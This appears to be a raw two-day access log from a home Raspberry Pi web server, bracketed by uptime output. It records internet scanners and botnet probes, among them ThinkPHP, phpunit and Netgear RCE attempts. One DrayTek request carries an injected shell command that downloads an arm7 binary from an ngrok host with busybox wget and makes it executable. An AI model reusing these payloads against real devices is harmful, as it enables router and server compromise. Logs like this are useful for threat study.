Fri May 8 06:25:07 MDT 2020
06:25:07 up 73 days, 10:53, 1 user, load average: 0.31, 0.27, 0.27
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
pi tty7 :0 24Feb20 73days 1:27m 2.81s /usr/bin/lxsession -s LXDE-pi -e LXDE
92.118.160.57 - - [08/May/2020:12:32:13 +0000] "GET / HTTP/1.0" 200 25000 "" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
193.42.99.162 - - [08/May/2020:12:57:31 +0000] "UNKNOWN UNKNOWN" 0 0 "" ""
193.42.99.162 - - [08/May/2020:12:57:31 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" ""
195.54.160.121 - - [08/May/2020:13:15:32 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [08/May/2020:13:24:18 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [08/May/2020:13:24:19 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [08/May/2020:13:36:00 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.188.206.50 - - [08/May/2020:14:15:23 +0000] "UNKNOWN UNKNOWN" 400 0 "" ""
87.213.242.179 - - [08/May/2020:15:02:47 +0000] "GET / HTTP/1.0" 200 25000 "" ""
34.87.253.204 - - [08/May/2020:15:05:01 +0000] "UNKNOWN HTTP/1.0" 501 0 "" ""
162.243.137.232 - - [08/May/2020:15:49:51 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
195.54.160.121 - - [08/May/2020:16:05:54 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
95.165.152.218 - - [08/May/2020:16:35:22 +0000] "GET / HTTP/1.1" 400 0 "" ""
92.63.194.30 - - [08/May/2020:17:10:58 +0000] "UNKNOWN UNKNOWN" 400 0 "" ""
89.248.171.97 - - [08/May/2020:19:06:59 +0000] "UNKNOWN UNKNOWN" 400 0 "" ""
162.243.137.209 - - [08/May/2020:19:21:26 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
183.56.152.172 - - [08/May/2020:19:44:19 +0000] "UNKNOWN UNKNOWN" 400 0 "" ""
103.109.179.74 - - [08/May/2020:20:01:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
213.174.0.104 - - [08/May/2020:20:18:31 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
104.199.36.222 - - [08/May/2020:20:30:43 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.23.0"
46.52.205.37 - - [08/May/2020:21:11:18 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
189.115.191.170 - - [08/May/2020:22:01:32 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1 HTTP/1.1" 400 0 "" "Mozilla/5.0"
189.115.191.170 - - [08/May/2020:22:01:36 +0000] "UNKNOWN UNKNOWN" 400 0 "" ""
24.228.59.71 - - [08/May/2020:22:21:36 +0000] "UNKNOWN UNKNOWN" 400 0 "" ""
24.228.59.71 - - [08/May/2020:22:21:36 +0000] "GET / HTTP/1.1" 200 25000 "" ""
103.10.208.230 - - [08/May/2020:23:06:54 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC BOTNET"
103.10.208.230 - - [08/May/2020:23:06:55 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC BOTNET"
103.10.208.230 - - [08/May/2020:23:06:55 +0000] "UNKNOWN UNKNOWN" 400 0 "" ""
103.10.208.230 - - [08/May/2020:23:06:57 +0000] "UNKNOWN UNKNOWN" 400 0 "" ""
185.153.196.245 - - [08/May/2020:23:27:12 +0000] "UNKNOWN UNKNOWN" 400 0 "" ""
45.46.222.55 - - [09/May/2020:01:03:38 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet"
45.46.222.55 - - [09/May/2020:01:03:38 +0000] "UNKNOWN UNKNOWN" 400 0 "" ""
144.202.106.32 - - [09/May/2020:03:03:15 +0000] "UNKNOWN UNKNOWN" 400 0 "" ""
195.54.160.121 - - [09/May/2020:03:20:47 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
78.11.66.190 - - [09/May/2020:03:23:54 +0000] "GET / HTTP/1.1" 400 0 "" ""
195.54.160.121 - - [09/May/2020:03:34:03 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [09/May/2020:03:34:04 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [09/May/2020:03:53:29 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
162.243.140.252 - - [09/May/2020:03:55:02 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
193.42.99.162 - - [09/May/2020:04:05:26 +0000] "UNKNOWN UNKNOWN" 0 0 "" ""
193.42.99.162 - - [09/May/2020:04:05:26 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" ""
96.65.72.247 - - [09/May/2020:05:30:10 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC"
96.65.72.247 - - [09/May/2020:05:30:12 +0000] "UNKNOWN UNKNOWN" 400 0 "" ""
203.205.34.110 - - [09/May/2020:06:04:31 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
137.59.16.179 - - [09/May/2020:07:21:51 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
2.184.39.127 - - [09/May/2020:07:32:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
195.54.160.121 - - [09/May/2020:07:43:28 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
190.92.26.74 - - [09/May/2020:07:53:58 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
190.92.26.74 - - [09/May/2020:07:53:58 +0000] "UNKNOWN UNKNOWN" 400 0 "" ""
185.100.87.248 - - [09/May/2020:08:34:31 +0000] "GET / HTTP/1.0" 200 25000 "" ""
185.100.87.248 - - [09/May/2020:08:36:26 +0000] "GET /nmaplowercheck1589013386 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
185.100.87.248 - - [09/May/2020:08:36:27 +0000] "GET /HNAP1 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
185.100.87.248 - - [09/May/2020:08:36:28 +0000] "HEAD / HTTP/1.1" 200 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
185.100.87.248 - - [09/May/2020:08:36:29 +0000] "GET /evox/about HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
185.100.87.248 - - [09/May/2020:08:36:29 +0000] "GET / HTTP/1.0" 200 25000 "" ""
185.100.87.248 - - [09/May/2020:08:36:29 +0000] "POST /sdk HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
185.100.87.248 - - [09/May/2020:08:36:30 +0000] "GET / HTTP/1.1" 200 25000 "" ""
52.168.139.229 - - [09/May/2020:09:42:26 +0000] "UNKNOWN UNKNOWN" 0 0 "" ""
52.168.139.229 - - [09/May/2020:09:42:26 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" ""
195.54.160.121 - - [09/May/2020:10:26:18 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [09/May/2020:10:26:48 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [09/May/2020:10:26:50 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [09/May/2020:10:27:49 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [09/May/2020:10:39:51 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [09/May/2020:11:08:02 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [09/May/2020:11:13:15 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
37.49.230.180 - - [09/May/2020:11:38:47 +0000] "GET /cgi-bin/nobody/ HTTP/1.0" 404 0 "" ""
61.219.11.153 - - [09/May/2020:12:21:52 +0000] "UNKNOWN UNKNOWN" 0 0 "" ""
Sat May 9 06:25:07 MDT 2020
06:25:08 up 74 days, 10:53, 1 user, load average: 0.28, 0.24, 0.26
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
pi tty7 :0 24Feb20 74days 1:27m 2.81s /usr/bin/lxsession -s LXDE-pi -e LXDE